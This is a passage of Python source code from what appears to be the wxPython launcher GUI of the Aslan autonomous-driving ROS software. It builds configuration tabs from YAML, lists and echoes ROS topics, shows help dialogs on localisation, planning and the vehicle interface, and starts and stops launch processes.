self.tab_names = \
[self.name_get_cond(tab, cond=cond, def_ret='').replace('tab_', '', 1) for tab in self.all_tabs]
new_btn_grps = (lambda btn_names, tab_names=self.tab_names:
[[self.obj_get('button_{}_{}'.format(bn, tn)) for tn in tab_names] for bn in btn_names])
self.alias_grps = new_btn_grps(('rosbag', 'rviz', 'rqt'))
for grp in self.alias_grps:
wx.CallAfter(self.alias_sync, get_top(grp))
s = get_tooltip_obj(grp[0])
if s:
for obj in grp[1:]:
set_tooltip_str(obj, s)
self.stat_dic = {}
for k in ['pmap']:
self.stat_dic[k] = False
rospy.Subscriber('pmap_stat', std_msgs.msg.Bool, self.stat_callback, callback_args=k)
# Tools tab (Rosbag play stop pause, rostopic list + refresh, echo, info, rviz, nodes graph)
tab1 = self.tab_tools
self.all_tabs.append(tab1)
self.simulation_cmd = {}
self.all_cmd_dics.append(self.simulation_cmd)
dictools = self.load_yaml('tools.yaml')
self.add_params(dictools.get('params', []))
self.setup_buttons(dictools.get('buttons'), self.simulation_cmd)
self.topics_dic = self.load_yaml('topics.yaml')
self.topics_list = []
self.topics_echo_curr_topic = None
self.topics_echo_proc = None
self.topics_echo_thinf = None
self.topics_echo_que = Queue.Queue()
self.topics_echo_sum = 0
thinf = th_start(self.topics_echo_show_th)
self.all_th_infs.append(thinf)
self.refresh_topics_list()
# logout thread
interval = 0.01
thinf = th_start(self.logout_th, {'que': self.log_que_stdout, 'interval': interval})
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, {'que': self.log_que_stderr, 'interval': interval})
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, {'que': self.log_que, 'interval': interval})
self.all_th_infs.append(thinf)
# Thumbnail
bm = wx.Bitmap(src_dir() + 'Aslan_Icon.png')
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bm)
self.SetIcon(icon)
def logout_th(self, que, interval, ev):
if que == self.log_que_stdout or que == self.log_que_stderr:
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
self.log_que.put(s)
if interval <= 0:
continue
else: # == self.log_que
f = None
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
print s.strip()
sys.stdout.flush()
s = cut_esc(s)
if f:
f.write(s)
f.flush()
if f:
f.close()
def stat_callback(self, msg, k):
self.stat_dic[k] = msg.data
if k == 'pmap':
v = self.stat_dic.get(k)
wx.CallAfter(self.label_point_cloud_bar.SetLabel, 'OK' if v else '')
def name_get_cond(self, obj, cond=(lambda s: True), def_ret=None):
return next((nm for nm in dir(self) if cond(nm) and getattr(self, nm) is obj), def_ret)
def __do_layout(self):
pass
def OnSetupVehicleInterface(self, event):
obj = self.button_vehicle_interface
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
self.update_func(pdic, gdic, prm)
#
# for Topics
#
def OnRefreshTopics(self, event):
self.refresh_topics_list()
def refresh_topics_list(self):
lst = subprocess.check_output(['rostopic', 'list']).strip().split('\n')
panel = self.panel_topics_list
szr = self.sizer_topics_list
for obj in self.topics_list:
szr.Remove(obj)
obj.Destroy()
self.topics_list = []
for topic in lst:
obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, topic, '')
self.Bind(wx.EVT_HYPERLINK, self.OnTopicLink, obj)
szr.Add(obj, 0, wx.LEFT, 4)
fix_link_color(obj)
self.topics_list.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
# info clear
lb = self.label_topics_info
lb.SetLabel('')
# echo clear
self.topics_proc_th_end()
# wait que clear
while self.topics_echo_que.qsize() > 0:
time.sleep(0.1)
tc = self.text_ctrl_topics_echo
tc.Enable(False)
wx.CallAfter(tc.Clear)
wx.CallAfter(tc.Enable, True)
self.topics_echo_sum = 0
self.topic_echo_curr_topic = None
def OnEcho(self, event):
if self.checkbox_topics_echo.GetValue() and self.topic_echo_curr_topic:
self.topics_proc_th_start(self.topic_echo_curr_topic)
else:
self.topics_proc_th_end()
def OnTopicLink(self, event):
obj = event.GetEventObject()
topic = obj.GetLabel()
self.topic_echo_curr_topic = topic
# info
info = subprocess.check_output(['rostopic', 'info', topic]).strip()
lb = self.label_topics_info
lb.SetLabel(info)
lb.GetParent().FitInside()
# echo
self.topics_proc_th_end()
if self.checkbox_topics_echo.GetValue():
self.topics_proc_th_start(topic)
def topics_proc_th_start(self, topic):
out = subprocess.PIPE
err = subprocess.STDOUT
self.topics_echo_proc = psutil.Popen(['rostopic', 'echo', topic], stdout=out, stderr=err)
self.topics_echo_thinf = th_start(self.topics_echo_th)
def topics_proc_th_end(self):
thinf = self.topics_echo_thinf
if thinf:
th_end(thinf)
self.topics_echo_thinf = None
proc = self.topics_echo_proc
if proc:
terminate_children(proc)
terminate(proc)
# proc.wait()
self.topics_echo_proc = None
def topics_echo_th(self, ev):
if not self.topics_echo_proc:
return
file = self.topics_echo_proc.stdout
fl = fcntl.fcntl(file.fileno(), fcntl.F_GETFL)
fcntl.fcntl(file.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
while not ev.wait(0):
try:
s = file.read(1)
except:
continue
if not s:
break
if self.checkbox_topics_echo.GetValue():
self.topics_echo_que.put(s)
que_clear(self.topics_echo_que)
def topics_echo_show_th(self, ev):
que = self.topics_echo_que
interval = self.topics_dic.get('gui_update_interval_ms', 100) * 0.001
chars_limit = self.topics_dic.get('gui_chars_limit', 10000)
tc = self.text_ctrl_topics_echo
while not ev.wait(interval):
qsz = que.qsize()
if qsz <= 0:
continue
if qsz > chars_limit:
over = qsz - chars_limit
for i in range(over):
try:
que.get(timeout=1)
except Queue.Empty:
break
qsz = chars_limit
arr = []
for i in range(qsz):
try:
s = que.get(timeout=1)
except Queue.Empty:
s = ''
arr.append(s)
s = ''.join(arr)
self.topics_echo_sum += len(s)
rm_chars = 0
if self.topics_echo_sum > chars_limit:
rm_chars = self.topics_echo_sum - chars_limit
self.topics_echo_sum = chars_limit
if self.checkbox_topics_echo.GetValue():
wx.CallAfter(append_tc_limit, tc, s, rm_chars)
# Configuration Tab
def OnSensingDriver(self, event):
self.OnChecked_obj(event.GetEventObject())
def OnROSbagRecord(self, event):
self.dlg_rosbag_record.show()
obj = event.GetEventObject()
set_val(obj, False)
# Infos
def OnInfoVM(self, event):
message = "The Visualization button automatically unzips the .stl model of the vehicle of your choice and " \
"launches RVIZ.\n\n TIP: Try increasing the alpha parameter on RVIZ. \n\n " \
"For more info, visit: vehicle_configuration"
self.dialog_info(message)
def OnInfoSensors(self, event):
message = "Select the Sensors Setup for your vehicle.\n\nThe camera drivers require additional packages " \
"to be installed, as described here: sensing/drivers/camera/README.md\n\n " \
"The UMRR Radar Driver, requires further configuration and interfacing, visit: sensing/drivers/radar/umrr_driver"
self.dialog_info(message)
def OnInfoTF1(self, event):
message = "TF maintains the relationship between coordinate frames in a tree structure and lets the user " \
"transform points etc between any two coordinate frames.\n\nMeasure the distance between your " \
"localizer (lidar) sensor and the baselink of your vehicle (center of rear axis).\n\nFor " \
"more info, visit: http://wiki.ros.org/tf"
self.dialog_info(message)
def OnInfoPCD(self, event):
message = "The package pcd_loader is loading a point cloud map. Choose the .pcd map you want to" \
" load, to update the launch file argument 'pcd_file'.\n\nFor more info, visit: mapping/pcd_loader"
self.dialog_info(message)
def OnInfoTF2(self, event):
message = "The package map_tf_generator is applying a transformation from the map frame to the world frame. It requires " \
"the point cloud map to be loaded.\n\nTIP: Wait for the pcd_loader to load your map fully and then launch this package.\n\n" \
"For more info, visit: mapping/map_tf_generator"
self.dialog_info(message)
def OnInfoFilters(self, event):
message = "These packages are filtering the output point cloud from the lidar or the radar sensor.\n\n" \
"Voxel Grid Filter is downsampling the point cloud generated using VoxelGrid filtering, " \
"for more info visit: http://pointclouds.org/documentation/tutorials/voxel_grid.php \n\n" \
"Ray Ground Filter is performing ground removal by masking the point cloud generated. Adapt the parameters based on the position of your sensors" \
"in the car\n\n" \
"TIP: From the config dialogs, you can select the point cloud topic you would like to filter.\n\n" \
"For more info, visit: src/sensing/filters "
self.dialog_info(message)
def OnInfoNDT(self, event):
message = "NDT Mapping is extracting the 3D map from a recorded lidar scan of an area.\n" \
"NDT Matching is responsible for localizing the vehicle in the pre recorded .pcd map by using the " \
"Normal Distributions Transform technique.\n" \
"NDT Matching Monitor is performing a health monitoring and reinitialization for ndt_matching.\n\n" \
"For more info, visit: src/localization/packages/lidar_localizer\n\n" \
"For more info on NDT, visit: https://www.streetdrone.com/post/hello-world-localisation-ndt "
self.dialog_info(message)
def OnInfoRoute1(self, event):
message = "The Waypoints Loader is responsible for loading the path waypoints from a csv file.\n" \
"The Waypoints Saver is responsible for generating waypoints by recreating the path the vehicle followed while mapping.\n\n" \
"TIP1: To generate waypoints you need to replay a rosbag, " \
"load the pcd map generated from that rosbag, localize in the map " \
"and then start extracting the path.\n\n " \
"TIP2: To visualize the output on rviz, add the topic MarkerArray\n\n" \
"For more info, visit: src/planning/motion/waypoint_maker "
self.dialog_info(message)
def OnInfoRoute2(self, event):
message = "Lane Selection is launching the traffic_waypoints and the lane_select nodes. It's responsible for" \
" drawing lanes between the waypoints for the vehicle to follow, by finding the closest waypoint to the vehicle's current position.\n\n" \
"For more info, visit: src/planning/mission/lane_planner"
self.dialog_info(message)
def OnInfoTraj1(self, event):
message = "This package is based on the A* search algorithm for path planning. It is responsible for " \
"finding the optimal(shortest) path for the vehicle to follow in order to reach the next target waypoint.\n\n" \
"Obstacle Search: This is responsible for detecting obstacles within a specific (avoidance) distance and updating the path of the car.\n" \
"Obstacle Sim: This can be used to simulate obstacles on rviz. It allows the user to draw obstacles using the 2d Nav Goal tool.\n" \
"Velocity Request: Based on the distance of the vehicle and the obstacle in it's path, this node is responsible for accelerating, decelerating and stopping the vehicle.\n\n" \
"For more info, visit: src/planning/motion/astar_planner "
self.dialog_info(message)
def OnInfoTraj2(self, event):
message = "Pure pursuit: This is responsible for calculating the twist command for controlling the vehicle, by " \
"fitting a curve between the vehicle and the next target waypoint, " \
"based on the lookahead distance.\n" \
"Low Pass filtering: This is responsible for filtering the twist_raw command by applying a low pass filter.\n\n" \
"For more info, visit: src/planning/motion/waypoint_follower"
self.dialog_info(message)
def OnInfoSup(self, event):
message = "High level supervisor node, monitoring the health of the system and publishing diagnostic messages for each package.\n\n" \
"For more info, visit: src/supervisor/check_message_alive"
self.dialog_info(message)
def OnInfoVI(self, event):
message = "The StreetDrone Vehicle Interface is the bridge between ROS and the StreetDrone embedded system (XCU) CAN input. " \
"Control loop feedback mechanisms are also implemented in the interface for vehicle speed and steer control.\n\n" \
"TIP: If you are using PEAK_USB, you need to click on Enable SocketCAN before launching the node.\n\n" \
"For more info, visit: src/vehicle_interface"
self.dialog_info(message)
def OnInfoSim(self, event):
message = "Gazebo simulation packages for the StreetDrone Twizy vehicle. Choose the world you would like to use from the dropdown menu." \
" Also select whether you would like to launch rviz alongside, with a default configuration.\n\n" \
"For more info, visit: vehicle_simulation/gazebo/sd_twizy_model"
self.dialog_info(message)
def OnInfoControl(self, event):
message = "The simulation can be controlled by the /sd_control topic, published by:\n " \
"1. Launching the StreetDrone Vehicle Interface, when the sd_simulation_mode param flag is set to true.\n" \
"2. Launching the Joystick controller. You can map specific buttons for your joystick using the parameters on config, visit http://wiki.ros.org/joy\n" \
"3. Launching the Keyboard controller node. Follow the instructions on the pop up terminal window.\n\n" \
"For more info, visit: vehicle_simulation/gazebo/sd_twizy_model"
self.dialog_info(message)
def dialog_info(self, message):
dialog = wx.MessageDialog(self.notebook_1, message, caption=wx.MessageBoxCaptionStr,
style=wx.OK | wx.CENTRE, pos=wx.DefaultPosition)
dialog.ShowModal()
dialog.Destroy()
def create_checkboxes(self, dic, panel, sizer, probe_dic, run_dic, bind_handler):
# if 'name' not in dic:
# return
obj = None
bdr_flg = wx.ALL
if 'subs' in dic:
lst = []
for d in dic['subs']:
self.create_checkboxes(d, panel, lst, probe_dic, run_dic, bind_handler)
if dic['name']:
obj = static_box_sizer(panel, dic.get('name'))
set_tooltip(obj.GetStaticBox(), dic)
else:
obj = wx.BoxSizer(wx.VERTICAL)
for (o, flg) in lst:
obj.Add(o, 0, wx.EXPAND | flg, 0)
else:
obj = wx.CheckBox(panel, wx.ID_ANY, dic['name'])
set_tooltip(obj, dic)
self.Bind(wx.EVT_CHECKBOX, bind_handler, obj)
bdr_flg = wx.LEFT | wx.RIGHT
if 'probe' in dic:
probe_dic[obj] = (dic['probe'], None)
if 'run' in dic:
run_dic[obj] = (dic['run'], None)
else:
gdic = self.gdic_get_1st(dic)
self.add_cfg_info(obj, obj, dic.get('name'), None, gdic, False, None)
if sizer is not None:
sizer.append((obj, bdr_flg))
else:
panel.SetSizer(obj)
def alias_grp_top_obj(self, obj):
return get_top(self.alias_grp_get(obj), obj)
def alias_grp_get(self, obj):
return next((grp for grp in self.alias_grps if obj in grp), [])
def name_get(self, obj):
return next((nm for nm in dir(self) if getattr(self, nm) is obj), None)
def is_toggle_button(self, obj):
return self.name_get(obj).split('_')[0] == 'button' and getattr(obj, 'GetValue', None)
def alias_sync(self, obj, v=None):
en = None
if getattr(obj, 'IsEnabled', None):
(key, en) = enables_get_last(obj)
if not key:
en = obj.IsEnabled()
grp = self.alias_grp_get(obj)
if getattr(obj, 'GetValue', None):
v = obj.GetValue()
for o in grp:
if o is obj:
continue
if en is not None and o.IsEnabled() != en and not self.is_toggle_button(o):
# if key:
# enable_set(o, key, en)
# else:
o.Enable(en)
if v is not None and getattr(o, 'SetValue', None):
set_val(o, v)
if getattr(o, 'SetInsertionPointEnd', None):
o.SetInsertionPointEnd()
def create_tree(self, parent, items, tree, item, cmd_dic):
name = items.get('name', '')
if tree is None:
style = wx.TR_HAS_BUTTONS | wx.TR_NO_LINES | wx.TR_HIDE_ROOT | wx.TR_DEFAULT_STYLE | wx.SUNKEN_BORDER
tree = CT.CustomTreeCtrl(parent, wx.ID_ANY, agwStyle=style)
# for disable wrong scrolling at checked
tree.AcceptsFocus = MethodType(lambda self: False, tree, CT.CustomTreeCtrl)
item = tree.AddRoot(name, data=tree)
tree.Bind(wx.EVT_MOTION, self.OnTreeMotion)
else:
ct_type = 1 if 'cmd' in items else 0 # 1:checkbox type
item = tree.AppendItem(item, name, ct_type=ct_type)
if 'desc' in items:
item.SetData(items.get('desc'))
if 'cmd' in items:
cmd_dic[item] = (items['cmd'], None)
pdic = self.load_dic_pdic_setup(name, items)
pnl = wx.Panel(tree, wx.ID_ANY)
add_objs = []
gdic = self.gdic_get_1st(items)
if 'param' in items:
self.new_link(item, name, pdic, gdic, pnl, 'config', items.get('param'), add_objs)
else:
self.add_cfg_info(item, item, name, None, gdic, False, None)
szr = sizer_wrap(add_objs, wx.HORIZONTAL, flag=wx.ALIGN_CENTER_VERTICAL, parent=pnl)
szr.Fit(pnl)
tree.SetItemWindow(item, pnl)
for sub in items.get('subs', []):
self.create_tree(parent, sub, tree, item, cmd_dic)
return tree
def new_link(self, item, name, pdic, gdic, pnl, link_str, prm_name, add_objs):
lkc = None
if 'no_link' not in gdic.get('flags', []):
lkc = wx.HyperlinkCtrl(pnl, wx.ID_ANY, link_str, "")
fix_link_color(lkc)
self.Bind(wx.EVT_HYPERLINK, self.OnHyperlinked, lkc)
if len(add_objs) > 0:
add_objs += [wx.StaticText(pnl, wx.ID_ANY, ' ')]
add_objs += [wx.StaticText(pnl, wx.ID_ANY, '['), lkc, wx.StaticText(pnl, wx.ID_ANY, ']')]
prm = self.get_param(prm_name)
self.add_cfg_info(lkc if lkc else item, item, name, pdic, gdic, False, prm)
def OnTreeMotion(self, event):
tree = event.GetEventObject()
pt = event.GetPosition()
event.Skip()
(item, flags) = tree.HitTest(pt)
if flags & CT.TREE_HITTEST_ONITEMLABEL == 0:
return
text = item.GetData()
if not text:
return
x = item.GetX()
y = item.GetY()
w = item.GetWidth()
h = item.GetHeight()
(x, y) = tree.CalcScrolledPosition(x, y)
iw = tree.GetItemWindow(item)
w -= iw.GetSize()[0] if iw else 0
if not wx.Rect(x, y, w, h).Contains(pt):
return
(x, y) = tree.ClientToScreen((x, y))
self.tip_info = (tree, text, wx.Rect(x, y, w, h))
if getattr(self, 'tip_timer', None) is None:
self.tip_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnTipTimer, self.tip_timer)
self.tip_timer.Start(200, oneShot=True)
def OnTipTimer(self, event):
if getattr(self, 'tip_info', None):
(tree, text, rect) = self.tip_info
(w, h) = self.GetSize()
wx.TipWindow(tree, text, maxLength=w, rectBound=rect)
def OnTreeChecked(self, event):
self.OnChecked_obj(event.GetItem())
def OnChecked_obj(self, obj):
self.OnLaunchKill_obj(obj)
def OnHyperlinked(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def OnHyperlinked_obj(self, obj):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return
dic_list_push(gdic, 'dialog_type', 'config')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
def update_func(self, pdic, gdic, prm):
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
func = gdic_v.get('func')
if func is None and name in pdic:
continue
v = var.get('v')
if func is not None:
v = eval(func) if type(func) is str else func()
pdic[name] = v
hook = gdic_v.get('update_hook')
if hook:
hook(v)
hook_var = gdic_v.get('hook_var', {})
every_time = 'every_time' in hook_var.get('flags', [])
if var == gdic.get('update_func_arg_var') or every_time:
hook = hook_var.get('hook')
if hook:
hook(hook_var.get('args', {}))
if 'pub' in prm:
self.publish_param_topic(pdic, prm)
self.rosparam_set(pdic, prm)
self.update_depend_enable(pdic, gdic, prm)
def update_depend_enable(self, pdic, gdic, prm):
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
depend = gdic_v.get('depend')
if depend is None:
continue
vp = gdic_v.get('var')
if vp is None:
continue
v = pdic.get(depend)
if v is None:
continue
depend_bool = eval(gdic_v.get('depend_bool', 'lambda v : bool(v)'))
v = depend_bool(v)
enables_set(vp, 'depend', v)
def publish_param_topic(self, pdic, prm):
pub = prm['pub']
klass_msg = globals()[prm['msg']]
msg = klass_msg()
for (name, v) in pdic.items():
if prm.get('topic') == '/twist_cmd' and name == 'twist.angular.z':
v = -v
(obj, attr) = msg_path_to_obj_attr(msg, name)
if obj and attr in obj.__slots__:
type_str = obj._slot_types[obj.__slots__.index(attr)]
setattr(obj, attr, str_to_rosval(v, type_str, v))
if 'stamp' in prm.get('flags', []):
(obj, attr) = msg_path_to_obj_attr(msg, 'header.stamp')
setattr(obj, attr, rospy.get_rostime())
pub.publish(msg)
def obj_to_pdic_gdic_prm(self, obj, sys=False):
info = self.config_dic.get(obj)
if info is None:
sys_prm = self.get_param('sys')
prm_chk = lambda prm: prm is sys_prm if sys else prm is not sys_prm
info = next((v for v in self.config_dic.values() if v.get('obj') is obj and prm_chk(v.get('param'))), None)
if info is None:
return (None, None, None)
pdic = info.get('pdic')
prm = info.get('param')
gdic = info.get('gdic')
return (pdic, gdic, prm)
def obj_to_gdic(self, obj, def_ret=None):
(_, gdic, _) = self.obj_to_pdic_gdic_prm(obj) if obj else (None, None, None)
return gdic if gdic else def_ret
def cfg_obj_dic(self, arg_dic, sys=False, def_ret=(None, {})):
sys_prm = self.get_param('sys')
prm_chk = {
True: (lambda prm: prm is sys_prm),
False: (lambda prm: prm is not sys_prm),
None: (lambda prm: True)}.get(sys)
arg_dic_chk = lambda dic: all([dic.get(k) == v for (k, v) in arg_dic.items()])
return next(((cfg_obj, dic) for (cfg_obj, dic) in self.config_dic.items() \
if arg_dic_chk(dic) and prm_chk(dic.get('param'))), def_ret)
def cfg_dic(self, arg_dic, sys=False, def_ret={}):
(_, dic) = self.cfg_obj_dic(arg_dic, sys=sys, def_ret=(None, def_ret))
return dic
def cfg_prm_to_obj(self, arg_dic, sys=False):
return self.cfg_dic(arg_dic, sys=sys).get('obj')
def rosparam_set(self, pdic, prm):
rosparams = None
for var in prm.get('vars', []):
name = var['name']
if 'rosparam' not in var or name not in pdic:
continue
rosparam = var['rosparam']
v = pdic.get(name)
v = str(v)
cvdic = {'True': 'true', 'False': 'false'}
if v in cvdic:
v = cvdic.get(v)
if rosparams is None:
cmd = ['rosparam', 'list']
rosparams = subprocess.check_output(cmd).strip().split('\n')
nm = rosparam
nm = ('/' if len(nm) > 0 and nm[0] != '/' else '') + nm
exist = nm in rosparams
if exist:
cmd = ['rosparam', 'get', rosparam]
ov = subprocess.check_output(cmd).strip()
if ov == v:
continue
elif v == '':
continue
cmd = ['rosparam', 'set', rosparam, v] if v != '' else ['rosparam', 'delete', rosparam]
print(cmd)
subprocess.call(cmd)
def obj_to_add_args(self, obj, msg_box=True):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return None
if 'open_dialog' in gdic.get('flags', []) and msg_box:
dic_list_push(gdic, 'dialog_type', 'open')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
self.update_func(pdic, gdic, prm)
s = ''
vars = []
for var in prm.get('vars'):
cmd_param = var.get('cmd_param')
if cmd_param:
vars.append(var)
for var in vars[:]: # copy
cmd_param = var.get('cmd_param')
if cmd_param.get('tail'):
vars.remove(var)
vars.append(var)
for var in vars[:]: # copy
name = var.get('name')
flags = gdic.get(name, {}).get('flags', [])
if 'hide' in flags or 'disable' in flags:
vars.remove(var)
for var in vars:
cmd_param = var.get('cmd_param')
name = var.get('name')
v = pdic.get(name)
if (v is None or v == '') and 'default' in cmd_param:
v = cmd_param.get('default')
if dic_eval_if_str(self, cmd_param, 'must') and (v is None or v == ''):
print 'cmd_param', name, 'is required'
if msg_box:
wx.MessageBox('cmd_param ' + name + ' is required')
return False
if dic_eval_if_str(self, cmd_param, 'only_enable') and not v:
continue
if dic_eval_if_str(self, cmd_param, 'only_disable') and v:
continue
name = cmd_param.get('var_name', name)
unpack = cmd_param.get('unpack')
if unpack is not None:
v = ' '.join(v.split(unpack))
add = ''
dash = cmd_param.get('dash')
if dash is not None:
add += dash + name
delim = cmd_param.get('delim')
if delim is not None:
str_v = str(v)
if var.get('kind') is None:
str_v = adjust_num_str(str_v)
if var.get('kind') == 'path':
str_v = path_expand_cmd(str_v)
str_v = os.path.expandvars(os.path.expanduser(str_v))
relpath_from = var.get('relpath_from')
if relpath_from:
relpath_from = path_expand_cmd(relpath_from)
relpath_from = os.path.expandvars(os.path.expanduser(relpath_from))
str_v = os.path.relpath(str_v, relpath_from)
add += delim + str_v
if add != '':
s += add + ' '
return s.strip(' ').split(' ') if s != '' else None
def OnLaunchKill(self, event):
self.OnLaunchKill_obj(event.GetEventObject())
def OnLaunchKill_obj(self, obj):
self.alias_sync(obj)
obj = self.alias_grp_top_obj(obj)
v = obj.GetValue() # true, false depends on selected or not
add_args = self.obj_to_add_args(obj, msg_box=v) # no open dialog at kill
if add_args is False:
set_val(obj, not v)
return
(cmd_dic, _, proc_bak) = self.obj_to_cmd_dic_cmd_proc(obj)
self.launch_kill_proc(obj, cmd_dic, add_args=add_args)
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc != proc_bak:
self.toggle_enable_obj(obj)
def OnROSbagPlay(self, event):
obj = event.GetEventObject()
play = self.button_play_rosbag_play
stop = self.button_stop_rosbag_play
pause = self.button_pause_rosbag_play
(_, _, prm) = self.obj_to_pdic_gdic_prm(play)
var = self.get_var(prm, 'sim_time', {})
if obj == play:
var['v'] = True
self.OnLaunchKill_obj(play)
button_color_change(play)
set_val(stop, False)
set_val(pause, False)
elif obj == stop:
set_val(stop, True)
set_val(play, False)
set_val(pause, False)
var['v'] = False
self.OnLaunchKill_obj(play)
button_color_change(stop)
elif obj == pause:
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(play)
if proc:
proc.stdin.write(' ')
def obj_to_cmd_dic(self, obj):
return next((cmd_dic for cmd_dic in self.all_cmd_dics if obj in cmd_dic), None)
def obj_to_cmd_dic_cmd_proc(self, obj):
cmd_dic = self.obj_to_cmd_dic(obj)
if cmd_dic is None:
return (None, None, None)
(cmd, proc) = cmd_dic.get(obj, (None, None))
return cmd_dic, cmd, proc
def toggle_enable_obj(self, obj):
objs = []
pfs = ['button_play_', 'button_stop_', 'button_pause_',
'button_ref_', 'text_ctrl_']
key = self.obj_key_get(obj, pfs)
if key:
objs += self.key_objs_get(pfs, key)
gdic = self.obj_to_gdic(obj, {})
objs += [eval_if_str(self, e) for e in gdic.get('ext_toggle_enables', [])]
self.toggle_enables(objs)
def toggle_enables(self, objs):
for obj in objs:
if getattr(obj, 'IsEnabled', None):
en = enables_get(obj, 'toggle', obj.IsEnabled())
enables_set(obj, 'toggle', not en)
self.alias_sync(obj)
def obj_key_get(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return None
return next((name[len(pf):] for pf in pfs if name[:len(pf)] == pf), None)
def key_objs_get(self, pfs, key):
return [self.obj_get(pf + key) for pf in pfs if self.obj_get(pf + key)]
def obj_to_varpanel(self, obj, var_name):
gdic = self.obj_to_gdic(obj, {})
return gdic.get(var_name, {}).get('var')
def obj_to_varpanel_tc(self, obj, var_name):
vp = self.obj_to_varpanel(obj, var_name)
return vp.tc if vp and vp.tc else None
def load_yaml(self, filename, def_ret=None):
return load_yaml(filename, def_ret)
def add_params(self, params):
for prm in params:
if 'topic' in prm and 'msg' in prm:
klass_msg = globals()[prm['msg']]
prm['pub'] = rospy.Publisher(prm['topic'], klass_msg, latch=True, queue_size=10)
self.params += params
def setup_buttons(self, d, run_dic):
for (k, d2) in d.items():
pfs = ['button_', 'checkbox_']
obj = next((self.obj_get(pf + k) for pf in pfs if self.obj_get(pf + k)), None)
if not obj:
s = 'button_' + k
obj = StrValObj(s, False)
setattr(self, s, obj)
if not d2 or type(d2) is not dict:
continue
if 'run' in d2:
run_dic[obj] = (d2['run'], None)
set_tooltip(obj, d2)
gdic = self.gdic_get_1st(d2)
if 'param' in d2:
pdic = self.load_dic_pdic_setup(k, d2)
prm = self.get_param(d2.get('param'))
for var in prm.get('vars'):
name = var.get('name')
if name not in pdic and 'v' in var:
pdic[name] = var.get('v')
for (name, v) in pdic.items():
restore = eval(gdic.get(name, {}).get('restore', 'lambda a : None'))
restore(v)
self.add_cfg_info(obj, obj, k, pdic, gdic, False, prm)
pnls = [gdic.get(var.get('name'), {}).get('panel') for var in prm.get('vars')]
for pnl in [gdic.get('panel')] + pnls:
if pnl:
self.set_param_panel(obj, eval_if_str(self, pnl))
else:
self.add_cfg_info(obj, obj, k, None, gdic, False, None)
def obj_get(self, name):
return getattr(self, name, None)
def log_th(self, file, que, ev):
while not ev.wait(0):
s = file.readline()
if not s:
break
que.put(s)
def proc_to_cmd_dic_obj(self, proc):
for cmd_dic in self.all_cmd_dics:
obj = next((obj for (obj, v) in cmd_dic.items() if proc in v), None)
if obj:
return (cmd_dic, obj)
return (None, None)
def OnClose(self, event):
if self.quit_select() != 'quit':
return
# kill_all
for proc in self.all_procs[:]: # copy
(_, obj) = self.proc_to_cmd_dic_obj(proc)
self.launch_kill(False, 'dmy', proc, obj=obj)
for thinf in self.all_th_infs:
th_end(thinf)
self.Destroy()
def quit_select(self):
lst = [
('Save and Quit', ['save', 'quit']),
('Save to param.yaml', ['save']),
('Quit without saving', ['quit'])
]
choices = [s for (s, _) in lst]
dlg = wx.SingleChoiceDialog(self, 'Select: ', '', choices)
if dlg.ShowModal() != wx.ID_OK:
return 'not quit'
i = dlg.GetSelection() # index of choices
(_, f) = lst[i]
if 'save' in f:
self.save_param_yaml()
return 'quit' if 'quit' in f else 'not quit'
def save_param_yaml(self):
save_dic = {}
for (name, pdic) in self.load_dic.items():
if pdic and pdic != {}:
prm = self.cfg_dic({'name': name, 'pdic': pdic}).get('param', {})
no_saves = prm.get('no_save_vars', [])
pdic = pdic.copy()
for k in pdic.keys():
if k in no_saves:
del pdic[k]
save_dic[name] = pdic
names = []
for proc in self.all_procs:
(_, obj) = self.proc_to_cmd_dic_obj(proc)
name = self.cfg_dic({'obj': obj}).get('name')
names.append(name)
if 'booted_cmds' not in save_dic:
save_dic['booted_cmds'] = {}
save_dic.get('booted_cmds')['names'] = names
if save_dic != {}:
dir = src_dir()
print('saving param.yaml')
f = open(dir + 'param.yaml', 'w')
s = yaml.dump(save_dic, default_flow_style=False)
f.write(s)
f.close()
def launch_kill_proc(self, obj, cmd_dic, add_args=None):
if obj not in cmd_dic:
set_val(obj, False)
print('not implemented.')
return
v = obj.GetValue()
(cmd, proc) = cmd_dic[obj]
if not cmd:
set_val(obj, False)
proc = self.launch_kill(v, cmd, proc, add_args, obj=obj)
(cfg_obj, dic) = self.cfg_obj_dic({'obj': obj})
if cfg_obj and dic.get('run_disable'):
cfg_obj.Enable(not v)
cmd_dic[obj] = (cmd, proc)
def launch_kill(self, v, cmd, proc, add_args=None, sigint=None, obj=None, kill_children=None):
msg = None
msg = 'already launched.' if v and proc else msg
msg = 'already terminated.' if not v and proc is None else msg
msg = 'cmd not implemented.' if not cmd else msg
if msg is not None:
print(msg)
return proc
if v:
args = shlex.split(cmd)
if add_args:
args += add_args
print(args) # for debug
f = self.obj_to_gdic(obj, {}).get('stdout_func')
f = eval_if_str(self, f)
f = f if f else self.log_th
out = subprocess.PIPE if f else None
err = subprocess.STDOUT if f else None
if f == self.log_th:
err = subprocess.PIPE
shell = (len(args) > 0 and args[0] == 'do_shell_exec')
if shell:
args = ' '.join(args[1:])
